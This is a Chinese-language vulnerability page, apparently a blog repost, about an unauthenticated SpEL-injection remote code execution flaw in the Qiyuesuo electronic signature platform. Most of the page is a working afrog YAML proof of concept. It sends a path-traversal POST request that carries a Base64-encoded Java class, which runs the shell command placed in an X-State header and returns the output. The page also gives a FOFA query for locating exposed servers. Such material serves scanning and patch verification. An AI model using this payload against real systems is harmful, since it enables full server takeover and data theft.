契约锁电子签章平台add远程代码执行漏洞

漏洞信息

漏洞名称: 契约锁电子签章平台add远程代码执行漏洞

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 契约锁电子签章平台是一款广泛使用的电子签署服务,为企业提供合同签署、文档管理等功能,通常部署在企业内部或云服务中。该平台的add功能存在远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求,利用Spring框架的SpEL表达式注入漏洞,在服务器上执行任意代码。漏洞的根源在于对用户输入的处理不当,未能有效过滤或转义恶意输入,导致攻击者可以注入并执行恶意SpEL表达式。此漏洞的利用无需认证,攻击者可以直接通过网络发起攻击,可能导致服务器被完全控制,数据泄露,服务中断等严重后果。由于契约锁电子签章平台的广泛使用,此漏洞的影响范围较大,建议用户及时更新补丁或采取其他缓解措施。

产品厂商: 契约锁

产品名称: 契约锁-电子签署平台

搜索语法: app=”契约锁-电子签署平台”

来源: https://github.com/zan8in/afrog/blob/ed658b63affe20216ba235d4df2fd60c44063d59/pocs%2Ftemp%2Fafrog-pocs%2Fvulnerability%2Fqiyuesuo-template-html-add-rce.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

id: qiyuesuo-template-html-add-rce

info:
name: 契约锁电子签章平台add远程代码执行漏洞
author: avic123
severity: critical
verified: true
description: |
契约锁电子签章平台edits远程代码执行漏洞
fofa:app="契约锁-电子签署平台"
reference:
- https://1oecho.github.io/oYmYrVh51/
- https://mp.weixin.qq.com/s/tgliOzcVjoy70yMYZG7MOg
tags: qiyuesuo,rce
created: 2025/6/13

rules:
r0:
request:
method: POST
path: /captcha/%2e%2e/template/html/add
headers:
Content-Type: application/json
X-State: whoami
body: |
{"file":"1","title":"2","params":[{"extensionParam":"{\"expression\":\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='T (org.springframework.cglib.core.ReflectUtils).defineClass("QysTest",T (org.springframework.util.Base64Utils). decodeFromString("yv66vgAAADIBKAoAIQCWCACXCgCYAJkKAJgAmgoAmwCcCACdCgCbAJ4HAJ8IAKAIAKEIAKIIAKMKAB8ApAoApQCmCACnCgCYAKgKAKUAqQcAgwoAmACqCACrCgAsAKwKACEArQoAHwCqCACuCgAfAK8KALAAqggAsQoALACyCACzCAC0BwC1CgAfALYHALcKALgAuQgAugcAuwgAvAgAvQcAvgoAJwC/CgAnAMAKACcAwQgAwgcAwwgAxAgAxQkAxgDHCgDGAMgIAMkHAMoIAMsIAMwIAM0KAM4AzwoALADQCADRCADSCADTCADUCADVBwDWCgDXANgKANcA2QoA2gDbCgA9ANwIAN0KAD0A3goAPQDfBwDgCgBFAJYIAOEKACwA4goARQDjCADkCADlBwDmCgBMAOcIAOgHAOkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxReXNUZXN0OwEACGRvSW5qZWN0AQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAV2YXIyOAEAIkxqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbjsBAAV2YXIyNgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAV2YXIyNwEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABXZhcjMxAQAFdmFyMzIBABJMamF2YS9sYW5nL09iamVjdDsBAAV2YXIzMwEABXJlcG9uAQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAlyZXN1bHRTdHIBAAZlbmNvZGUBAAV2YXIzMAEABXZhcjI5AQABSQEABXZhcjIxAQAFdmFyMjIBAAV2YXIyMwEABXZhcjI0AQAFdmFyMjUBAAV2YXI3OAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEABXZhcjIwAQAFdmFyMTkBABJMamF2YS9sYW5nL1RocmVhZDsBAAV2YXIxOAEABHZhcjgBAAR2YXI5AQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAV2YXIxMAEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAFdmFyMTEBAAV2YXIxMgEABXZhcjEzAQAFdmFyMTQBAAV2YXIxNQEABXZhcjE2AQATW0xqYXZhL2xhbmcvVGhyZWFkOwEABXZhcjE3AQABWgEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAA21zZwEADVN0YWNrTWFwVGFibGUHAMMHAOoHAOsHAJ8HALUHAOwHALcHALsHAL4HAGcHAOYBAApTb3VyY2VGaWxlAQAMUXlzVGVzdC5qYXZhDABQAFEBAAVzdGFydAcA6gwA7QDuDADvAPAHAOsMAPEA8AEAHW9yZy5hcGFjaGUuY295b3RlLlJlcXVlc3RJbmZvDADyAPMBACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgEAEGphdmEubGFuZy5UaHJlYWQBABVqYXZhLmxhbmcuVGhyZWFkR3JvdXABACJvcmcuYXBhY2hlLmNveW90ZS5SZXF1ZXN0R3JvdXBJbmZvAQAHdGhyZWFkcwwA9AD1BwDsDAD2APcBAAZ0YXJnZXQMAPgA+QwA+gD7DAD8AFgBAARodHRwDAD9AP4MAP8BAAEACUVuZHBvaW50JAwBAQECBwEDAQAab3JnLmFwYWNoZS50b21jYXQudXRpbC5uZXQMAQQBBQEABnRoaXMkMAEACmdldEhhbmRsZXIBAA9qYXZhL2xhbmcvQ2xhc3MMAQYBBwEAEGphdmEvbGFuZy9PYmplY3QHAQgMAQkBCgEACWdldEdsb2JhbAEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BAAZnbG9iYWwBAApwcm9jZXNzb3JzAQATamF2YS91dGlsL0FycmF5TGlzdAwBCwEMDAENAQ4MAPoBDwEAE2dldFdvcmtlclRocmVhZE5hbWUBABBqYXZhL2xhbmcvU3RyaW5nAQADcmVxAQAHZ2V0Tm90ZQcBEAwBEQB8DAESARMBAAtnZXRSZXNwb25zZQEAEltMamF2YS9sYW5nL0NsYXNzOwEACWdldEhlYWRlcgEAB1gtU3RhdGUBAAdvcy5uYW1lBwEUDAEVARYMARcAWAEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyBwEYDAEZARoMARsBHAcBHQwBHgEfDABQASABAAJcQQwBIQEiDAEjAFgBABZzdW4vbWlzYy9CQVNFNjRFbmNvZGVyAQAFVVRGLTgMASQBJQwAaQEmAQAJYWRkSGVhZGVyAQAHc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24MAScAUQEABWVycm9yAQAHUXlzVGVzdAEAEGphdmEvbGFuZy9UaHJlYWQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAlnZXRQYXJlbnQBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAApnZXRQYWNrYWdlAQAVKClMamF2YS9sYW5nL1BhY2thZ2U7AQARamF2YS9sYW5nL1BhY2thZ2UBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAFY2xvbmUBABQoKUxqYXZhL2xhbmcv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"),new javax.management.loading.MLet(new java.net.URL[0],T (java.lang.Thread).currentThread().getContextClassLoader())).doInject()';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'](deStr);c.getValue();\"}","name":"test"}]}
expression: response.status == 200 && response.headers['x-state'] != "" && response.body.bcontains(b'"message":') && response.body.bcontains(b'"code":')
expression: r0()



契约锁电子签章平台add远程代码执行漏洞
http://example.com/2025/07/22/github_170615722/
作者
lianccc
发布于
2025年7月22日
许可协议